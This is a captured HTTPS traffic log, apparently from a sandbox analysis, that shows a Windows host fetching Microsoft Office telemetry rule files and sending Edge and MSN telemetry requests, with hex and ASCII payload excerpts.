2024-11-10 03:55:26 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.5	49875	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:26 UTC	192	OUT	GET /rules/rule120648v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:26 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:26 GMT Content-Type: text/xml Content-Length: 491 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B98B88612" x-ms-request-id: ac6bbd40-501e-007b-3e0c-2d5ba2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035526Z-16547b76f7fr4g8xhC1DFW9cqc0000000bag000000005nf6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-10 03:55:26 UTC	491	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.5	49876	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:26 UTC	192	OUT	GET /rules/rule120649v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:27 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:26 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT ETag: "0x8DC582BAEA4B445" x-ms-request-id: 1511aab4-801e-0015-535c-2ef97f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035526Z-15869dbbcc6sg5zbhC1DFWy5u8000000040g00000000es7q x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:27 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.5	49877	23.198.7.167	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:26 UTC	628	OUT	OPTIONS /bnc/notifications/count?app=anaheim&pageId=ntp HTTP/1.1 Host: www.bing.com Connection: keep-alive Accept: / Access-Control-Request-Method: GET Access-Control-Request-Headers: x-personalbing-csrf,x-personalbing-flights,x-search-clientid,x-search-uilang Origin: https://ntp.msn.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-10 03:55:27 UTC	2234	IN	HTTP/1.1 200 OK Content-Length: 0 Access-Control-Allow-Headers: * Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Max-Age: 7200 Cache-Control: private X-EventID: 67302eaf3c0046068397caf187416196 UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0= Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-HySw+kem1TRCgVoHY+Ori8iXrvVq5CN/kwqDPb8zXeo='; base-uri 'self';report-to csp-endpoint Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]} P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND" Date: Sun, 10 Nov 2024 03:55:27 GMT Connection: close Set-Cookie: MUID=0FA24958958F66DE38705C6B9407674B; domain=.bing.com; expires=Fri, 05-Dec-2025 03:55:27 GMT; path=/; secure; SameSite=None Set-Cookie: MUIDB=0FA24958958F66DE38705C6B9407674B; expires=Fri, 05-Dec-2025 03:55:27 GMT; path=/; HttpOnly Set-Cookie: _EDGE_S=F=1&SID=198879DCE38E679200246CEFE2066665; domain=.bing.com; path=/; HttpOnly Set-Cookie: _EDGE_V=1; domain=.bing.com; expires=Fri, 05-Dec-2025 03:55:27 GMT; path=/; HttpOnly Set-Cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 10-Nov-2026 03:55:27 GMT; path=/; secure; HttpOnly; SameSite=None Set-Cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 10-Nov-2026 03:55:27 GMT; path=/; secure; SameSite=None Set-Cookie: SRCHUID=V=2&GUID=7D4D84BE465B4A12AB6AAC973355106B&dmnchg=1; domain=.bing.com; expires=Tue, 10-Nov-2026 03:55:27 GMT; path=/; secure; SameSite=None Set-Cookie: SRCHUSR=DOB=20241110; domain=.bing.com; expires=Tue, 10-Nov-2026 03:55:27 GMT; path=/; secure; SameSite=None Set-Cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 10-Nov-2026 03:55:27 GMT; path=/; secure; SameSite=None Set-Cookie: _SS=SID=198879DCE38E679200246CEFE2066665; domain=.bing.com; path=/; secure; SameSite=None Alt-Svc: h3=":443"; ma=93600 X-CDN-TraceID: 0.b03a2f17.1731210927.2ee4dfb0

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.5	49878	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:27 UTC	192	OUT	GET /rules/rule120650v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:27 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:27 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989EE75B" x-ms-request-id: 0b1de546-a01e-003d-53c9-3098d7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035527Z-17df447cdb5bz95mhC1DFWnk7w000000085g00000000n61u x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:27 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.5	49881	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:27 UTC	192	OUT	GET /rules/rule120651v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:27 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:27 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 81840efa-e01e-0085-3c5a-32c311000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035527Z-15869dbbcc6vr5dxhC1DFWqn6400000006w0000000008kuk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:27 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.5	49882	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:27 UTC	192	OUT	GET /rules/rule120652v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:27 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:27 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97E6FCDD" x-ms-request-id: 59ce3d71-401e-0067-465c-3209c2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035527Z-17df447cdb59mt7dhC1DFWqpg400000008gg0000000002at x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-10 03:55:27 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.5	49880	20.189.173.17	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:27 UTC	1044	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1731210926049&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 11653 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=1C457A5C69C96D7328066F6F68476CEB; _EDGE_S=F=1&SID=04348CE3E2B16FF0131799D0E3856EA1; _EDGE_V=1; _C_ETH=1; msnup=
2024-11-10 03:55:27 UTC	11653	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 31 30 54 30 33 3a 35 35 3a 32 36 2e 30 34 32 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 66 39 38 30 65 34 37 35 2d 63 32 63 32 2d 34 63 31 63 2d 38 36 61 61 2d 30 38 30 38 32 61 34 36 65 62 33 35 22 2c 22 65 70 6f 63 68 22 3a 22 31 35 37 31 32 38 30 32 30 32 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-11-10T03:55:26.042Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"f980e475-c2c2-4c1c-86aa-08082a46eb35","epoch":"1571280202"},"app":{"locale
2024-11-10 03:55:27 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=ddc1d2d01c5943f8ad6c2d88425441bd&HASH=ddc1&LV=202411&V=4&LU=1731210927695; Domain=.microsoft.com; Expires=Mon, 10 Nov 2025 03:55:27 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=84be9fdf5edc4f7ebdbc15bc541b4beb; Domain=.microsoft.com; Expires=Sun, 10 Nov 2024 04:25:27 GMT; Path=/;Secure; SameSite=None time-delta-millis: 1646 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Sun, 10 Nov 2024 03:55:27 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.5	49879	20.189.173.17	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:27 UTC	1043	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1731210926052&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 5028 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=1C457A5C69C96D7328066F6F68476CEB; _EDGE_S=F=1&SID=04348CE3E2B16FF0131799D0E3856EA1; _EDGE_V=1; _C_ETH=1; msnup=
2024-11-10 03:55:27 UTC	5028	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 31 30 54 30 33 3a 35 35 3a 32 36 2e 30 35 31 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 66 39 38 30 65 34 37 35 2d 63 32 63 32 2d 34 63 31 63 2d 38 36 61 61 2d 30 38 30 38 32 61 34 36 65 62 33 35 22 2c 22 65 70 6f 63 68 22 3a 22 31 35 37 31 32 38 30 32 30 32 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-11-10T03:55:26.051Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"f980e475-c2c2-4c1c-86aa-08082a46eb35","epoch":"1571280202"},"app":{"locale
2024-11-10 03:55:27 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=93ca1ab95dc54b4295ea3c485a67e304&HASH=93ca&LV=202411&V=4&LU=1731210927744; Domain=.microsoft.com; Expires=Mon, 10 Nov 2025 03:55:27 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=99c38c113182459e8449785739adb9c8; Domain=.microsoft.com; Expires=Sun, 10 Nov 2024 04:25:27 GMT; Path=/;Secure; SameSite=None time-delta-millis: 1692 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Sun, 10 Nov 2024 03:55:27 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
99	192.168.2.5	49883	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:27 UTC	192	OUT	GET /rules/rule120653v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:27 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:27 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C710B28" x-ms-request-id: 94271b33-901e-0067-284a-2eb5cb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035527Z-15869dbbcc6xcpf8hC1DFWxtx00000000ee00000000077t3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:27 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
100	192.168.2.5	49884	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:27 UTC	192	OUT	GET /rules/rule120654v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:27 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:27 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT ETag: "0x8DC582BA54DCC28" x-ms-request-id: a6b44ea6-e01e-001f-1d33-2f1633000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035527Z-15869dbbcc6lxrkghC1DFWqpdc00000004dg00000000a3v0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
